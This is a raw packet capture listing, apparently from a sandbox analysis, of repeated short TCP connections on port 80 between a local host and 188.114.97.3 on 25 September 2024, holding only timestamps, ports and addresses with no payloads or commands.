Sep 25, 2024 10:20:16.034810066 CEST	49778	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.039726973 CEST	80	49778	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.039823055 CEST	49778	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.041939020 CEST	49778	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.046772003 CEST	80	49778	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.046849012 CEST	49778	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.051692009 CEST	80	49778	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.724160910 CEST	80	49778	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.724335909 CEST	49778	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.724839926 CEST	80	49778	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.724931955 CEST	49778	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.729212999 CEST	80	49778	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.862847090 CEST	49779	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.867881060 CEST	80	49779	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.867989063 CEST	49779	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.870119095 CEST	49779	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.874917030 CEST	80	49779	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:16.874999046 CEST	49779	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:16.879872084 CEST	80	49779	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:17.550465107 CEST	80	49779	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:17.550652981 CEST	49779	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:17.551028013 CEST	80	49779	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:17.551080942 CEST	49779	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:17.555475950 CEST	80	49779	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:17.688628912 CEST	49780	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:17.693789959 CEST	80	49780	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:17.693996906 CEST	49780	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:17.696146011 CEST	49780	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:17.701025963 CEST	80	49780	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:17.701123953 CEST	49780	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:17.706072092 CEST	80	49780	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:18.430228949 CEST	80	49780	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:18.430391073 CEST	80	49780	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:18.430421114 CEST	49780	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:18.430460930 CEST	49780	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:18.436115026 CEST	80	49780	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:18.564835072 CEST	49781	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:18.569956064 CEST	80	49781	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:18.570066929 CEST	49781	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:18.572189093 CEST	49781	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:18.577024937 CEST	80	49781	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:18.577127934 CEST	49781	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:18.581959963 CEST	80	49781	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:19.235716105 CEST	80	49781	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:19.235882044 CEST	49781	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:19.237006903 CEST	80	49781	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:19.237060070 CEST	49781	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:19.242304087 CEST	80	49781	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:19.376559019 CEST	49782	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:19.381544113 CEST	80	49782	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:19.381654024 CEST	49782	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:19.383768082 CEST	49782	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:19.388539076 CEST	80	49782	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:19.388645887 CEST	49782	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:19.393523932 CEST	80	49782	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:20.044056892 CEST	80	49782	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:20.044241905 CEST	80	49782	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:20.044296980 CEST	49782	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:20.044296980 CEST	49782	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:20.049175024 CEST	80	49782	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:20.190942049 CEST	49783	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:20.195913076 CEST	80	49783	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:20.196000099 CEST	49783	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:20.198115110 CEST	49783	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:20.429464102 CEST	80	49783	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:20.429527998 CEST	49783	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:20.434420109 CEST	80	49783	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.084366083 CEST	80	49783	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.084561110 CEST	49783	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.085623026 CEST	80	49783	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.085686922 CEST	49783	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.089401960 CEST	80	49783	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.221061945 CEST	49784	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.226109028 CEST	80	49784	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.226210117 CEST	49784	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.228310108 CEST	49784	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.233179092 CEST	80	49784	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.233232975 CEST	49784	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.238087893 CEST	80	49784	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.896749020 CEST	80	49784	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.896883011 CEST	49784	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.897192955 CEST	80	49784	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:21.897242069 CEST	49784	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:21.901715040 CEST	80	49784	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.033376932 CEST	49785	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.038305044 CEST	80	49785	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.038424969 CEST	49785	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.040514946 CEST	49785	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.045283079 CEST	80	49785	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.045367002 CEST	49785	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.050179958 CEST	80	49785	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.717554092 CEST	80	49785	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.717674971 CEST	49785	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.717739105 CEST	80	49785	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.717782021 CEST	49785	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.722686052 CEST	80	49785	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.864341974 CEST	49786	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.869329929 CEST	80	49786	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.869476080 CEST	49786	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.871623039 CEST	49786	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.876573086 CEST	80	49786	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:22.876652956 CEST	49786	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:22.881505966 CEST	80	49786	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:23.536905050 CEST	80	49786	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:23.537060022 CEST	49786	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:23.538039923 CEST	80	49786	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:23.538100958 CEST	49786	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:23.542017937 CEST	80	49786	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:23.673821926 CEST	49787	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:23.678993940 CEST	80	49787	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:23.679106951 CEST	49787	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:23.681214094 CEST	49787	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:23.686125040 CEST	80	49787	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:23.686182022 CEST	49787	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:23.690994024 CEST	80	49787	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:24.397758007 CEST	80	49787	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:24.398011923 CEST	49787	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:24.398407936 CEST	80	49787	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:24.398456097 CEST	49787	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:24.402808905 CEST	80	49787	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:24.532989979 CEST	49788	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:24.537951946 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:24.538052082 CEST	49788	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:24.540045977 CEST	49788	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:24.544960022 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:24.545069933 CEST	49788	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:24.550043106 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.365967035 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.366080999 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.366091013 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.366305113 CEST	49788	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:25.366305113 CEST	49788	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:25.371418953 CEST	80	49788	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.503875017 CEST	49789	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:25.508889914 CEST	80	49789	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.509041071 CEST	49789	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:25.511182070 CEST	49789	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:25.516062021 CEST	80	49789	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:25.516197920 CEST	49789	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:25.521086931 CEST	80	49789	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:26.201577902 CEST	80	49789	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:26.202085018 CEST	80	49789	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:26.202166080 CEST	49789	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:26.203496933 CEST	49789	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:26.208265066 CEST	80	49789	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:26.354799986 CEST	49790	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:26.359735966 CEST	80	49790	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:26.359909058 CEST	49790	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:26.362179995 CEST	49790	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:26.367070913 CEST	80	49790	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:26.367186069 CEST	49790	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:26.372035980 CEST	80	49790	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.025301933 CEST	80	49790	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.025480986 CEST	49790	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.025619030 CEST	80	49790	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.025671005 CEST	49790	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.030371904 CEST	80	49790	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.175219059 CEST	49791	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.180259943 CEST	80	49791	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.180399895 CEST	49791	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.182550907 CEST	49791	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.187495947 CEST	80	49791	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.187594891 CEST	49791	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.192553043 CEST	80	49791	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.837362051 CEST	80	49791	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.837447882 CEST	49791	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.837754011 CEST	80	49791	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.837788105 CEST	49791	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.842255116 CEST	80	49791	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.992031097 CEST	49792	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.996964931 CEST	80	49792	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:27.997076035 CEST	49792	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:27.999268055 CEST	49792	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.005045891 CEST	80	49792	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.005116940 CEST	49792	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.011651039 CEST	80	49792	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.650580883 CEST	80	49792	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.650713921 CEST	80	49792	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.650734901 CEST	49792	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.650763988 CEST	49792	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.655543089 CEST	80	49792	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.811358929 CEST	49793	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.816227913 CEST	80	49793	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.816315889 CEST	49793	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.818383932 CEST	49793	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.823301077 CEST	80	49793	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:28.823348045 CEST	49793	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:28.828100920 CEST	80	49793	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:29.642699957 CEST	80	49793	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:29.642863035 CEST	49793	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:29.643138885 CEST	80	49793	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:29.643183947 CEST	49793	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:29.647628069 CEST	80	49793	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:29.781157970 CEST	49794	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:29.786082029 CEST	80	49794	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:29.786151886 CEST	49794	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:29.788256884 CEST	49794	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:29.792992115 CEST	80	49794	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:29.793056965 CEST	49794	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:29.797821999 CEST	80	49794	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:30.571324110 CEST	80	49794	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:30.571363926 CEST	80	49794	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:30.571474075 CEST	49794	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:30.571561098 CEST	49794	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:30.576546907 CEST	80	49794	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:30.711003065 CEST	49795	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:30.716702938 CEST	80	49795	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:30.716797113 CEST	49795	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:30.718878984 CEST	49795	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:30.724201918 CEST	80	49795	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:30.724247932 CEST	49795	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:30.729645967 CEST	80	49795	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:31.376924038 CEST	80	49795	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:31.377166986 CEST	49795	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:31.377459049 CEST	80	49795	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:31.377520084 CEST	49795	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:31.382077932 CEST	80	49795	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:31.517575979 CEST	49796	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:31.522809982 CEST	80	49796	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:31.522897959 CEST	49796	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:31.524990082 CEST	49796	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:31.529772043 CEST	80	49796	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:31.529839993 CEST	49796	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:31.534734011 CEST	80	49796	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:32.191046000 CEST	80	49796	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:32.191159964 CEST	49796	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:32.193236113 CEST	80	49796	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:32.193286896 CEST	49796	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:32.195931911 CEST	80	49796	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:32.331578970 CEST	49797	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:32.341995001 CEST	80	49797	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:32.342108011 CEST	49797	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:32.344170094 CEST	49797	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:32.348927021 CEST	80	49797	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:32.349270105 CEST	49797	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:32.354032040 CEST	80	49797	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.000392914 CEST	80	49797	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.000474930 CEST	49797	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.000767946 CEST	80	49797	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.000838995 CEST	49797	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.006817102 CEST	80	49797	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.146752119 CEST	49798	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.151680946 CEST	80	49798	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.151758909 CEST	49798	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.153882027 CEST	49798	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.158895016 CEST	80	49798	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.159073114 CEST	49798	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.164062023 CEST	80	49798	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.843158007 CEST	80	49798	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.843257904 CEST	49798	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.843461037 CEST	80	49798	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.847187042 CEST	49798	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.848087072 CEST	80	49798	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.992506981 CEST	49799	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.997356892 CEST	80	49799	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:33.997468948 CEST	49799	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:33.999581099 CEST	49799	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.004687071 CEST	80	49799	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.004750967 CEST	49799	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.009727955 CEST	80	49799	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.678819895 CEST	80	49799	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.678915977 CEST	49799	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.679104090 CEST	80	49799	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.679142952 CEST	49799	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.683974981 CEST	80	49799	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.819960117 CEST	49800	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.824750900 CEST	80	49800	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.824922085 CEST	49800	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.826895952 CEST	49800	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.831631899 CEST	80	49800	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:34.831696033 CEST	49800	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:34.836503029 CEST	80	49800	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:35.509651899 CEST	80	49800	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:35.509821892 CEST	80	49800	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:35.509846926 CEST	49800	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:35.509884119 CEST	49800	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:35.514687061 CEST	80	49800	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:35.664809942 CEST	49801	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:35.669723988 CEST	80	49801	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:35.669811010 CEST	49801	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:35.671930075 CEST	49801	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:35.676671028 CEST	80	49801	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:35.676731110 CEST	49801	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:35.681508064 CEST	80	49801	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:36.333214045 CEST	80	49801	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:36.333409071 CEST	49801	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:36.333503008 CEST	80	49801	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:36.333548069 CEST	49801	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:36.338191032 CEST	80	49801	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:36.476083040 CEST	49802	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:36.481040001 CEST	80	49802	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:36.481117010 CEST	49802	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:36.483275890 CEST	49802	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:36.488044024 CEST	80	49802	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:36.488105059 CEST	49802	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:36.493056059 CEST	80	49802	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:37.191843987 CEST	80	49802	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:37.192020893 CEST	49802	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:37.193159103 CEST	80	49802	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:37.193216085 CEST	49802	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:37.196799040 CEST	80	49802	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:37.335180998 CEST	49803	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:37.340145111 CEST	80	49803	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:37.340266943 CEST	49803	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:37.342505932 CEST	49803	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:37.347359896 CEST	80	49803	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:37.347438097 CEST	49803	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:37.352268934 CEST	80	49803	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.011996984 CEST	80	49803	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.012160063 CEST	49803	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.012217999 CEST	80	49803	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.012269020 CEST	49803	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.018122911 CEST	80	49803	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.158313990 CEST	49804	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.163157940 CEST	80	49804	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.163400888 CEST	49804	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.165472984 CEST	49804	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.170603991 CEST	80	49804	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.170705080 CEST	49804	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.177550077 CEST	80	49804	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.830640078 CEST	80	49804	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.830734968 CEST	49804	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.831799030 CEST	80	49804	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.831842899 CEST	49804	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.835741997 CEST	80	49804	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.971363068 CEST	49805	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.976260900 CEST	80	49805	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.976358891 CEST	49805	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.978502035 CEST	49805	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.983282089 CEST	80	49805	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:38.983344078 CEST	49805	80	192.168.2.7	188.114.97.3
Sep 25, 2024 10:20:38.990380049 CEST	80	49805	188.114.97.3	192.168.2.7
Sep 25, 2024 10:20:39.656409979 CEST	80	49805	188.114.97.3	192.168.2.7
